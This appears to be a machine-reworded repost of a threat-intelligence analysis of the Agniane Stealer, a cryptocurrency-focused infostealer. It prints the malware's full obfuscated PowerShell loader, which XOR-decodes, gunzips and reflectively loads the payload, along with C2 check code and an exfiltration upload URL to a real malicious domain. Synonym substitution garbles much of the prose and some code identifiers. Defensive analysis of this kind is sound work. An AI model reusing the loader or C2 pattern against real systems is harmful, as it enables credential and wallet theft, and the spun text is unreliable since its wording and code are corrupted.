Home Healthcare Agniane Stealer: Data stealer concentrated on cryptocurrency customers

Agniane Stealer: Data stealer concentrated on cryptocurrency customers

0
Agniane Stealer: Data stealer concentrated on cryptocurrency customers

[ad_1]

The Agniane Stealer is an information-stealing malware principally concentrated on the cryptocurrency wallets of its sufferers. It won reputation on the web beginning in August 2023. Just lately, we’ve got noticed a definite marketing campaign spreading it throughout our telemetry. Our fresh learn about has resulted in the a hit identity and detailed research of a in the past unrecognized community URL trend. Our researchers have just lately exposed additional information at the malware’s strategies for record assortment and the intricacies of its command and regulate (C2) protocol. We even have new opposite engineering insights into the malware’s structure and communique.

We consider our paintings contributes to tactical and operational ranges of intelligence relating to Agniane Stealer. It may turn out helpful from incident reaction to detector building and can be extra appropriate for a technical target market.

The Agniane Stealer has already been referenced in numerous articles. The Agniane stealer malware is being actively advertised and offered via a Telegram channel, obtainable at t[.]me/agniane. Attainable patrons could make purchases at once by the use of this channel by way of interacting with a specialised bot, named @agnianebot, which facilitates the transaction procedure and gives further details about the malware.” Our technical research signifies that it makes use of the ConfuserEx Protector and goals at similar objectives. Alternatively, it employs a definite C2 manner, in keeping with the pattern noticed in our telemetry knowledge. Due to this fact, we’ve got made up our minds to put up a technical research of the pattern.

Advent

All over our threat-hunting workout routines in November 2023, we’ve got spotted a trend of renamed PowerShell binaries, known as passbook.bat.exe. On nearer inspection of the host machines, we’ve got known infections of the newly came upon malware circle of relatives of Agniane Stealer. Danger study Gameel Ali (@MalGamy12) first disclosed the lifestyles of this malware on their X account. Researchers from the Zscaler ThreatLabz Group [2] and Pulsedive Danger Researchers [3] ultimately adopted up with weblog posts of their very own. Our paintings goals to give a contribution additional info working out campaigns involving the usage of Agniane Stealer.

Execution Chain

Execution chain.

The infections we detected appear to begin with the downloading of ZIP recordsdata from compromised internet sites. The entire internet sites from the place we’ve got observed the obtain of this record in our telemetry are customary internet sites with respectable content material. All obtain URLs had the underneath URL trend:

http[s]://<area identify>/book_[A-Z0-9]+-d+.zip

As soon as downloaded and extracted, the downloaded ZIP record drops a BAT record (passbook.bat) and further ZIP record at the record gadget. The BAT record incorporates an obfuscated payload and after its execution via cmd.exe, it drops an executable which is renamed model of PowerShell binary (passbook.bat.exe). [4]

This enamed PowerShell used to be used to execute collection of obfuscated instructions.

passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(‘txeTllAdaeR'[-1..-11] -join ”)(‘C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat’).Break up([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(‘:: @’)) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); ruin; }; };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Exchange($_CASH_ceCmX, ‘_CASH_’, ”);$_CASH_afghH = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(‘gnirtS46esaBmorF'[-1..-16] -join ”)(‘ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=’);for ($i = 0; $i -le $_CASH_afghH.Duration – 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object Machine.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object Machine.IO.MemoryStream;$_CASH_QbnHO = New-Object Machine.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(‘daoL'[-1..-4] -join ”)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] (”)))

The command line proven above plays the next movements:

  • Reads the content material of the in the past extracted BAT record (passbook.bat).
  • Via string fits and replacements, builds the payload dynamically and assigns it to a variable.
  • Transformed payload and static key from Base64 to a byte array.
  • XOR’d the payload the usage of a static key.
  • Decompressed XOR’d payload the usage of GZIP.
  • Invokes payload after reflectively loading it into reminiscence.

To grasp movements taken towards the target, we reversed the payload.

Binary Research

The invoked payload continues with the execution of a C# meeting. We now have dumped it right into a record, the place we get the executable with underneath hash,

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.

At time of the research, the record used to be unknown to on-line sandboxes. We now have made up our minds to emulate the process at the Cisco Protected Malware Analytics sandbox with the generic settings in this record, which is the second one degree of the deployment of the stealer. The dynamic research may now not be finished as we didn’t execute the primary degree of the pattern of the malware. Due to this fact, we made up our minds to research the pattern manually, the place we discovered later there are anti-sandbox ways used.

The binary record used to be extremely obfuscated with regulate go with the flow manipulations, like ConfuserEx.

Content material of the passbook.bat record. Regulate go with the flow obfuscation like ConfuserEx.

You will need to be aware that the pattern didn’t include a signature for ConfuserEx, but it had an obfuscation manner that resembled it.

After reversing the pattern, we discovered it incorporates some other binary record in its sources segment, which have been getting reflectively loaded. The brand new binary used to be some other C#-based pattern, which contained the general payload. It used to be obfuscated with ConfuserEx with direct signatures.

Content material of the passbook.bat record. Regulate go with the flow obfuscation like ConfuserEx.
The C# record calling Invoke serve as for in reminiscence loading and executions, a not unusual solution to reflective loading of sources recordsdata.

As you’ll see from the former screenshot, it’s calling Invoke purposes from an access Level object, which incorporates a parsed useful resource.

Loading useful resource knowledge from malicious pattern, which is later done within the reminiscence. The beginning of the execution is within the symbol above.

All of the loading procedure seems as regardless that passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in flip, is working the tmp385C.tmp (tmp385C.tmp is only a header record identify) C# programs, which reflectively load the _CASH_78 C# utility. The general utility on this series is the Agniane Stealer:

Malware execution chain. _CASH_78 is the general payload. The former steps have been used just for obfuscations. There have been more than one levels of pattern to in any case loading _CASH_78 app. _CASH_78 app is ultimate malware, levels prior to are used just for supply, obfuscations or detection evasion.

Command and Regulate

The Agniane Stealer operates in an easy but environment friendly means, stealing credentials and recordsdata from the endpoint the usage of a fundamental C2 protocol. To begin with, it verifies the provision of any domains via a easy C# internet request, checking if the go back worth is “13.” This time request used to be made to a URL classified “check,” as an example.

WebClient wc = new WebClient();

urlData = wc.DownloadString(“https://trecube[.]com/check”);

If urlData == “13” {

list_of_active_c2.Upload(“trecube[.]com”)

proceed;

}

In our pattern, we will be able to see the next IOCs (signs of compromise) offered in sources record:

trecube[.]com

trecube13[.]ru

imitato23[.]retailer

wood100home[.]ru

For a lot of these domain names, the pattern is looking for a check URL.

Later, the malware calls C2 to get an inventory of record extensions to search for. That is situated at URL trend getext?identification= adopted by way of an ID – part of sources of the _CASH_78 record. In this web site, the listing of extensions is separated by way of a semicolon, and as an example on a web site trecube[.]retailer it seems like:

*.txt; *.document; *.docx; *.pockets; *seed*

Once more, that is treated as earlier checking string within the code. It’s parsed/cut up by way of semicolon and an inventory of extensions is created in an inventory of variables in C# code.

The Code dealing with by the use of dynamic research, in which we known the C2 URL as a breakpoint for DownloadString.

Due to this fact, the malware requests a faraway json record containing the main points about mistakes, VirusTotal hits, and so forth. In line with this data, the pattern both progresses or halts. We selected to center of attention our investigation on different sides which can be extra at once related to attribution and detection settings. Alternatively, you will need to be aware that the URL trend can be used for monitoring malware via telemetry or on-line sandbox services and products for OSINT functions. The URL seems like:

hxxps://trecube13[.]ru/getjson?identification=67

And right here what its corresponding output seems like:

{

“debug”: “0”,

“emulate”: “0”,

“virtualbox”: “1”,

“virustotal”: “0”,

“error”: “0”,

“errorname”: “NONE”,

“errortext”: “NONE”

“competitor”: “0”

}

The following degree comes to enumeration and assortment. It scans the pc to assemble all paperwork with specified extensions recommended by way of the URL with a “getext” trend, along side different credentials present in not unusual paths of the working gadget, equivalent to Mozilla Firefox garage, Chrome garage and stored Home windows credentials. It is a not unusual process among news stealer malware. Moreover, Agniane used to be checking to look the localization surroundings of the sufferer pc. If it incorporates any of the language applications underneath, it does now not continue with the an infection,

 

ru-RU

kk-KZ

ro-MD

uz-UZ

be-BY

az-Latn-AZ

hy-AM

ky-KG

tg-Cyrl-TJ

The allowlisting of a few areas too can imply the developer does now not wish to assault particular areas. In line with different observations it’s imaginable to be expecting the attacker is from a rustic with a powerful diplomatic tie to Russia.

As soon as the entire goal recordsdata are accumulated, the malware creates a ZIP archive beneath the “native utility knowledge” folder,

C:Customers[user]AppDataLocal[A-Z0-9]{32}

Underneath is the construction/content material of this archive record

Agniane Stealer.txt //added as attachement right here

Installe Apps.txt //added as attachement right here

PC Data.txt //added as attachement right here

Information from Desktop //FOLDER – incorporates exfiltrated recordsdata from Desktop folder

Information from … //FOLDER – incorporates exfiltrated recordsdata from …

 

… //and different folders, which include exfiltrated recordsdata.

It’s later uploaded to

https://trecube[.]com/gate?identification=67&construct=BAT&passwords=0&cookies=124&username=johnny&nation=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Underneath you’ll to find the illustrated model of the Agniane Stealer’s C2 communique,

The C2 communique protocol.

Different TTPs

The Agniane Stealer used to be additionally observed appearing following movements:

  • Enumerating registry key HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall for put in programs, it additionally collects this data.
  • Checking for a public IP on a ip-api.com, i.e,
    https://ip-api.com/json/?fields=11827
  • Dumping Bitcoin and different cryptocurrency wallets
  • Acting (now not smartly) exams to look if it’s working in a debugged or digital env. and so forth.
  • Accumulating pockets.dat recordsdata.
  • Enumerating Profile and Person knowledge.
  • Accumulating saved bank cards.
  • Including different malware like NGenTask.exe.log (the record with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).

Conclusion

The Agniane Stealer tries to stay undetected via quite a lot of obfuscation and anti-VM/debug ways. It reveals not unusual habits for stealers equivalent to gathering and exfiltrating recordsdata, credentials password, bank card main points, wallets, and so forth. Its evasive nature and concentrated on of quite a lot of news may draw in extra adversaries in long term to leverage its services and products.

Kill Chain

Kill Chain Task TTP
Weaponization Use of PowerShell, ZIP record, batch record T1059.005
T1059.001
Supply ZIP record downloaded by way of the browser T1204.002
Use of compromised internet sites T1584.004
Exploitation Working Obfuscated PowerShell payload T1059.001
T1027.010
PowerShell decrypts payload the usage of XOR and decompress the usage of Gunzip T1140
T1059.001
Reflective loading of the payload via Powershell T1059.001
T1204.002
T1620
Use of Renamed PowerShell T1036.003
Set up
Command and Regulate
Movements on Goals Number of quite a lot of news from the host T1119
Concentrated on of credentials T1555

Signs of Compromise

Kind Degree IOC (signs of compromise)
Document Hash Supply 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
Document Hash Supply e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
Document Hash Supply b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
Area C2 trecube[.]com
Area C2 trecube[.]retailer
Area C2 trecube13[.]ru
Area C2 imitato23[.]retailer
Area C2 wood100home[.]ru

References

[1] https://twitter.com/MalGamy12/standing/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://weblog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer


We’d love to listen to what you suppose. Ask a Query, Remark Underneath, and Keep Hooked up with Cisco Safety on social!

Cisco Safety Social Channels

Instagram
Fb
Twitter
LinkedIn

Percentage:



[ad_2]

LEAVE A REPLY

Please enter your comment!
Please enter your name here